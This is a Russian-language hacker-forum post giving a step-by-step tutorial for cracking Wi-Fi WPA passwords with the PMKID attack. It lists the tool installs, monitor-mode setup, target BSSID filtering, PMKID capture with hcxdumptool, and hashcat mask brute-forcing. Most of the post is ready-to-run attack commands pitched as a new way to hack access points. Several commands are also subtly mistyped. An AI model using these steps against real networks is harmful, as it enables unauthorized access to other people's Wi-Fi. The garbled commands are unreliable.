Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили форум хакеров.

bbc_Hash

Модератор
Команда форума
Пользователь
Регистрация
8 Янв 2019
Сообщения
527
Реакции
71
Баллы
118
[SIZE=12pt]Всем привет, сегодня я хочу рассказать вам о новом способе взлома беспроводной точки доступа. Как уже многие могли убедиться, он является более эффективным чем те, что мы использовали раньше. Поэтому начем![/SIZE]
[SIZE=12pt]Способ в том, чтобы заполучить специальный ключ PMKID, что переводится как Pairwise Master Key Identifier.[/SIZE]
[SIZE=12pt]Этот ключ позволяет узнать PSK – Pre-Shared Key, а именно он как раз-таки и является паролем от точки доступа. Вы спросите, чем же отличается данные метод от нам привычных? А тем, что нам не нужно получать полный хеншейк, и понадобится лишь один кадр EOPOL, ну а также еще одна отличительная черта - это то, что вам не нужно будет ждать, пока подключится какой-либо пользователь к сети, которую вы собираетесь атаковать. Связано это с тем, что атака будет производится на саму AP. [/SIZE]

[SIZE=20pt]Необходимое для совершения атаки:[/SIZE]
[SIZE=12pt]1. Linux[/SIZE]
[SIZE=12pt]2. hcxtools[/SIZE]
[SIZE=12pt]3. Hcxdumptool[/SIZE]
[SIZE=12pt]4. Hashcat v4.2.0[/SIZE]

[SIZE=20pt]Установка всего необходимого:[/SIZE]
[SIZE=12pt]Hcstools устанавливается точно так же как и hcxdumprool[/SIZE]
[SIZE=12pt]1. git clone ZerBea/hcxtools[/SIZE]
[SIZE=12pt]2. cd hcxtools[/SIZE]
[SIZE=12pt]3. make[/SIZE]
[SIZE=12pt]4. make install[/SIZE]
[SIZE=12pt]Hashcat v4.2.0[/SIZE]
[SIZE=12pt]Если у вас уже присутствует эта программа, но она ниже указанной версии, то, к сожалению, или к счастью, вы будете вынуждены ее удалить, а потом установить более новою версию. Либо же обновить ее другими способами, ведь это необходимо по той причине, что прошлые версию не могут расшифровать PMKID.[/SIZE]
[SIZE=12pt]1. git clone hashcat/hashcat[/SIZE]
[SIZE=12pt]2. cd hashcat[/SIZE]
[SIZE=12pt]3. make[/SIZE]
[SIZE=12pt]4. make install[/SIZE]
[SIZE=12pt]Сразу хочу сказать, для примера, я буду проводить атаку на собственный роутер, который имеет последнюю прошивку.[/SIZE]

[SIZE=20pt]Перевод беспроводного интерфейса в режим монитора[/SIZE]
[SIZE=12pt]Сделать это можно двумя методами, вот первый.[/SIZE]
[SIZE=12pt]Пишем[/SIZE] [SIZE=12pt]этот[/SIZE] [SIZE=12pt]код[/SIZE][SIZE=12pt]:[/SIZE]
[SIZE=12pt]airmon-ng start wlan0[/SIZE]
[SIZE=12pt]airmon-ng check kill[/SIZE]

[SIZE=12pt]Готово, теперь рассмотрим второй способ.[/SIZE]
[SIZE=12pt]Пишем[/SIZE] [SIZE=12pt]этот[/SIZE] [SIZE=12pt]код[/SIZE][SIZE=12pt]:[/SIZE]
[SIZE=12pt]ifconfig wlan0 down[/SIZE]
[SIZE=12pt]iwconfig wlan0 mode monitor[/SIZE]
[SIZE=12pt]ifconfig wlan0 up[/SIZE]
[SIZE=12pt]airmon-ng check kill[/SIZE]

[SIZE=20pt]Запуск сканирования WiFi точек[/SIZE]
[SIZE=12pt]Первым делом нам нужно запустить сканирование, сделать это можно данной командой:[/SIZE]
[SIZE=12pt]airodump wlan0mon[/SIZE][SIZE=12pt] (wlan0 выбираем смотря из того, какой метод вы использовали)[/SIZE]
[SIZE=12pt]После того как это будет выполнено, вам нужно будет сохранить BSSID необходимой точки AP без двоеточий в файл, сделать это можно с помощью такого кода:[/SIZE]
[SIZE=12pt]echo "60A44C55D7C0" > filter.txt[/SIZE]

[SIZE=20pt]Запуск[/SIZE][SIZE=20pt] Hcxdumptool[/SIZE]
[SIZE=12pt]Запуск выполняется с помощью данной команды: [/SIZE]
[SIZE=12pt]hcxdumptool –I wlan0 –o hash –filterlist=filter.txt --filtermode=2 -- enable_status=1[/SIZE]
[SIZE=12pt]Теперь обо всем по порядку:[/SIZE]
[SIZE=12pt]-i wlano – Эта строка указывает на название вашего интерфейса[/SIZE]
[SIZE=12pt]-o hash – файл получаемый на выходе, в котором содержится PMKID [/SIZE]
[SIZE=12pt]--filtermode=2 – укажет на то, что наш файл будет целевым списком[/SIZE]
[SIZE=12pt]--filterlist=filter.txt – текстовый файл BSSID, который мы уже создали ранее.[/SIZE]
[SIZE=12pt]--enable_status=1 – включения сообщний с помощью маски.[/SIZE]
[SIZE=12pt]Теперь, когда вы все это запустите, то через некоторое время вам придет сообщение – Found PMKID, после этого мы отключаем данный скрипт. Что тут еще сказать? Данная программа на ура выполняет свои задачи и находит необходимые нам пакеты, поэтому продолжим.[/SIZE]

[SIZE=20pt]Запуск hcxpcaptool[/SIZE]
[SIZE=12pt]Для этого вводим команду:[/SIZE]
[SIZE=12pt]hcxpcaptool –z hash_crack hash[/SIZE]
[SIZE=12pt]Опять же расскажу, что это все значит:[/SIZE]
[SIZE=12pt]-z hash_crack – это файл который мы получим нвыходе, где будет записан PMKID без лишнего мусора[/SIZE]
[SIZE=12pt]Hash – файл в формате pcapng, в нем будут находится все найденые пакеты hcxdumptool[/SIZE]

[SIZE=20pt]Запуск HASHCAT[/SIZE]
[SIZE=12pt]Достаточно ввести эту команду:[/SIZE]
[SIZE=12pt]hashcat –m 16800 –a 3 –w hash_crack ‘?u?s?d23456A’ --force [/SIZE]
[SIZE=12pt]В этой команде я хочу сказать только про –m 16800, именно эта команда и появляется в новой версии HASHCAT[/SIZE]
[SIZE=12pt]Итак, после этих действий вам будет выведет пароль по маске а также возможно два последних знака из данного пароля. Конечно, продолжать проверку больше суток я для примера не буду, поэтому введу несколько символов из своего пароля, после чего получил результат намного быстрее. А результатом как раз-таки был пароль.[/SIZE]
[SIZE=12pt]На этом все, поэтому теперь можно сказать о том, что этот способ намного эффективнее других атак. Конечно скорость получения результата не так уж и сильно превосходит aircrack-ng, но если же вы имеет у себя в компьютере хорошую видеокарту, то с этим можно даже поспорить. А также, теперь вам не нужно ждать неопределенное количество временя в ожидании подключения пользователя, так как теперь не нужно будет перехватывать хеншейк.[/SIZE]
 
Яндекс.Метрика